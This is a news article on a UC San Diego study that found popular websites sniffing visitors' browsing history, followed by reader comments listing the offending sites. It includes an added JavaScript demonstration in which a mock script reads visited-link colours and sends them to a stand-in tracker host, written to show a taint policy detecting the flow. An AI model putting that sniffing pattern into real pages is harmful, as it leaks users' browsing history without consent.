Study Finds Popular Sites Guilty of Hi-Jacking History

A recent study launched by the UC San Diego Department of
Computer Science to determine the scope of privacy-violating information flows at
popular websites shows that popular Web 2.0 applications such as mashups,
aggregators, and sophisticated ad targeting are teeming with various kinds of
privacy-violating flows. Ultimately the researchers determined that such attacks
are not being adequately defended against.

The study was prompted by the increasing complexity of
JavaScript web applications, which can propagate privacy-violating information flows. ‘Privacy-violating
information flows’ is a general term covering four kinds of nefarious activity:
cookie stealing, location hijacking, history sniffing, and behavior tracking.
The researchers' goal was to draw attention to the prevalence of history sniffing
at high-traffic sites.

Websites use these exploits to gather browsing information
about their visitors, then use that information to target ads and to determine
whether or not those visitors are also visiting competing sites.

The researchers designed a custom information-flow
policy language that let them detect privacy-violating flows in
JavaScript code, and used a modified Chrome browser to run their study over
the Alexa global top 50,000 websites (Alexa ranks websites by traffic).
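To make the idea of an information-flow policy concrete, here is a toy dynamic taint tracker in JavaScript. It is an added illustration written for this page, not code from the UCSD study or from Threatpost: the study instrumented the browser's JavaScript engine itself, whereas this toy makes page scripts go through an explicit concat() helper so the label propagation is visible. The "browser", its visited set, the two page scripts and every URL are constructed mocks, and the label name "history" is an assumption, so the example runs offline under Node with no real DOM.

```javascript
// Added example, not code from the UCSD study or from Threatpost: a toy dynamic
// taint tracker modelling an information-flow policy for history sniffing.
// Source: a link's computed colour, which in an unpatched browser depends on
// the :visited state, so it is labelled "history". Sink: any URL handed to
// the network. Browser, visited set, page scripts and URLs are constructed mocks.

// A value carrying the set of sensitivity labels it was derived from.
class Tainted {
  constructor(value, labels) {
    this.value = value;
    this.labels = new Set(labels);
  }
}

const labelsOf = (v) => (v instanceof Tainted ? v.labels : new Set());
const raw = (v) => (v instanceof Tainted ? v.value : v);

// Label propagation: a value built from tainted operands inherits every label.
// Returns a plain string when no operand was tainted.
function concat(...parts) {
  const labels = new Set();
  for (const p of parts) for (const l of labelsOf(p)) labels.add(l);
  const value = parts.map(raw).join('');
  return labels.size ? new Tainted(value, labels) : value;
}

// Constructed mock of a browser whose computed :visited colour reflects history.
// A browser that reports the unvisited style to scripts (the Firefox behaviour
// one commenter describes) would make this source carry no history at all.
function makeMockBrowser(visitedUrls) {
  const visited = new Set(visitedUrls);
  return {
    computedColor: (href) => (visited.has(href) ? 'rgb(85, 26, 139)' : 'rgb(0, 0, 238)'),
  };
}

// The monitor wraps source and sink and records policy violations:
// a "history"-labelled value must never reach the network sink.
function makeMonitor(browser) {
  const events = { sourceReads: 0, violations: [] };
  return {
    events,
    // Source API exposed to page scripts: every read is labelled "history".
    getComputedColor(href) {
      events.sourceReads += 1;
      return new Tainted(browser.computedColor(href), ['history']);
    },
    // Sink API exposed to page scripts: checks labels before "sending".
    sendToNetwork(url) {
      const labels = labelsOf(url);
      if (labels.has('history')) {
        events.violations.push({ url: raw(url), labels: [...labels] });
      }
      return raw(url);
    },
  };
}

// Classification mirroring the study's tiers: a script that only reads the
// source is "capable" of inferring history; one that moves a history-derived
// value to the network is "transferring" it.
function classify(events) {
  if (events.violations.length > 0) return 'transferring';
  if (events.sourceReads > 0) return 'capable';
  return 'clean';
}

// Constructed page script 1: reads link colours only for its own styling and
// sends a beacon that contains nothing derived from them.
function benignScript(api, hrefs) {
  const colours = hrefs.map((h) => raw(api.getComputedColor(h)));
  api.sendToNetwork('https://example.invalid/ping');
  return colours;
}

// Constructed page script 2: folds the history-derived values into a beacon URL.
function sniffingScript(api, hrefs) {
  let report = 'v=';
  for (const h of hrefs) {
    report = concat(report, api.getComputedColor(h), ';');
  }
  return api.sendToNetwork(concat('https://tracker.invalid/beacon?', report));
}

// Runs one constructed page script against a fresh mock browser and monitor.
function runScenario(script) {
  const browser = makeMockBrowser(['https://site-a.invalid/']);
  const monitor = makeMonitor(browser);
  script(monitor, ['https://site-a.invalid/', 'https://site-b.invalid/']);
  return classify(monitor.events);
}

console.log('benign page:', runScenario(benignScript));     // capable
console.log('sniffing page:', runScenario(sniffingScript)); // transferring
```

The two scenarios separate the study's "capable of inferring" tier from its "transferring" tier: both scripts touch the history-labelled source, but only the second lets a labelled value reach the network sink, and the policy flags exactly that flow rather than the read itself.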

Specifically, the study found that of the 50,000 sites,
485 are capable of inferring browser history data. Of these 485 sites, 63 were
transferring browser history data to their network, and 46 of those were actively
engaged in history sniffing. The researchers also found a number of sites
exhibiting suspicious behavior, but with their current methods were
unable to determine with certainty whether those sites were participating in
history sniffing.

Among the 46 sites employing this technique, adult sites
were the most common, but news, movie, sports, music and
finance sites appeared as well. The highest-ranking site, and the only one in the Alexa top
100, found guilty of history sniffing was the adult pornography site Youporn.

Discussion

  • Anonymous

    how about a list?
  • Anonymous

    At least one of the methods mentioned in the paper no longer works in Firefox (It will not allow the attacker to determine if a link was visited by checking its colour, as far as Javascript is concerned in Firefox links have never been visited, ever)
  • Anonymous

    Thanks Mr. Donohue.

    Article's worthless without a list.
  • Anonymous

    Table 1: Websites that perform real sniffing. Top-level domains are .com if not otherwise specified. s-p and a-g abbreviate sincortespublicitarios.com and answersingenesis.org. “Src” is the source of the history sniffing JavaScript code: “I”, “M” and “F” indicate the code came from interclick.com, meaningtool.com, and feedjit.com respectively, and “H” indicates the code came from the site itself.

    youporn, charter.net, feedjit, gamestorrents, newsmax, namepros, fulltono, youporngay, osdir, gamesfreak, morningstar, espnf1, netdoctor, narutocentral, subirimagenes, fucktube, straightdope, guardafilm, estrenosdtl, bgames, 10best, twincities, kaushik.net, todocvcd, filmannex, planet-f1, trailersplay, minyanville, pixmac, fotoflexer, xepisodes, s-p*, mimp3.net, allaccess, petitchef, bleachcentral, hoopsworld, net-games.biz, 6speedonline, msgdiscovery, moneynews, a-g*, divxatope, subtorrents, sesionvip, youporncocks
